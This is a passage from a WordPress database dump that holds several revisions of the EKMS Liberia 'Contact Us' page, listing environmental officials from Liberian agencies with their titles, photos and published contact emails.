/>LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:18:15','2021-02-25 15:18:15','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3510,42,'2021-02-25 15:18:15','2021-02-25 15:18:15','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony A. Yokie</strong><br />Manager<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a></p><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:18:15','2021-02-25 15:18:15','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3511,42,'2021-02-25 15:18:15','2021-02-25 15:18:15','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:18:15','2021-02-25 15:18:15','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3512,42,'2021-02-25 15:28:06','2021-02-25 15:28:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img 